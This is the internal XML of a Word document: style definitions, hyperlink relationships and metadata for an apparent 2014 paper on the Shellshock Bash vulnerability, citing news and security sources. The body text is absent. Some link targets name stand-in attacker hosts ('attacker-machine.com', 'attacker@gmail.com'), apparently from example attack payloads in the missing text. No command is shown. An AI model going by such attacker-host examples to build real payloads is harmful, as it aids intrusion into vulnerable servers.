      <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Numbered">
    <w:name w:val="Numbered"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink1">
    <w:name w:val="Hyperlink.1"/>
    <w:basedOn w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>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 w:type="paragraph" w:customStyle="1" w:styleId="TableStyle6">
    <w:name w:val="Table Style 6"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="357CA2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink2">
    <w:name w:val="Hyperlink.2"/>
    <w:basedOn w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink3">
    <w:name w:val="Hyperlink.3"/>
    <w:basedOn w:val="None"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink4">
    <w:name w:val="Hyperlink.4"/>
    <w:basedOn w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink5">
    <w:name w:val="Hyperlink.5"/>
    <w:basedOn w:val="Hyperlink1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00386C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6CE6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00386CE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86CE6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00316A35"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00316A35"/>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styleId="Title">
    <w:name w:val="Title"/>
    <w:next w:val="Body2"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body2">
    <w:name w:val="Body 2"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyA">
    <w:name w:val="Body A"/>
    <w:pPr>
      <w:spacing w:before="160" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:color="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="List0">
    <w:name w:val="List 0"/>
    <w:basedOn w:val="ImportedStyle1"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="3"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="ImportedStyle1">
    <w:name w:val="Imported Style 1"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="None">
    <w:name w:val="None"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink0">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="None"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Numbered">
    <w:name w:val="Numbered"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="5"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink1">
    <w:name w:val="Hyperlink.1"/>
    <w:basedOn w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableStyle3">
    <w:name w:val="Table Style 3"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="FEFFFE"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableStyle2">
    <w:name w:val="Table Style 2"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="000000"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="TableStyle6">
    <w:name w:val="Table Style 6"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
      <w:color w:val="357CA2"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink2">
    <w:name w:val="Hyperlink.2"/>
    <w:basedOn w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink3">
    <w:name w:val="Hyperlink.3"/>
    <w:basedOn w:val="None"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Default">
    <w:name w:val="Default"/>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink4">
    <w:name w:val="Hyperlink.4"/>
    <w:basedOn w:val="Hyperlink"/>
    <w:rPr>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink5">
    <w:name w:val="Hyperlink.5"/>
    <w:basedOn w:val="Hyperlink1"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:u w:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00386CE6"/>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86CE6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00386CE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386CE6"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
      <w:lang w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="BalloonTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00316A35"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
    <w:name w:val="Balloon Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BalloonText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00316A3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rendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-shellshock.pdf" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:attacker@gmail.com" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/New_York_Times" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.newsfactor.com/story.xhtml?story_id=00100018PJ6Y" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.microsoft.com/office/2007/relationships/stylesWithEffects" Target="stylesWithEffects.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://us-cert.gov" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/endnotes" Target="endnotes.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:attacker@gmail.com" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.nytimes.com/2014/09/26/technology/security-experts-expect-shellshock-software-bug-to-be-significant.html" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://news.netcraft.com/archives/2014/09/24/september-2014-web-server-survey.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker-machine.com" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Arstechnic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xample.com" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://netcraft.com" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker-machine.com" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://w3techs.com/technologies/overview/operating_system/all" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://erratasec.com" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://arstechnica.com/security/2014/09/still-more-vulnerabilities-in-bash-shellshock-becomes-whack-a-mole/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://example.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker-machine.com" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://w3techs.com" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-shellshock.pdf"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1019</TotalTime>
  <Pages>14</Pages>
  <Words>4320</Words>
  <Characters>24625</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>205</Lines>
  <Paragraphs>57</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>28888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Zhenghong Dong</cp:lastModifiedBy>
  <cp:revision>232</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2014-12-04T13:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-12-05T19:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>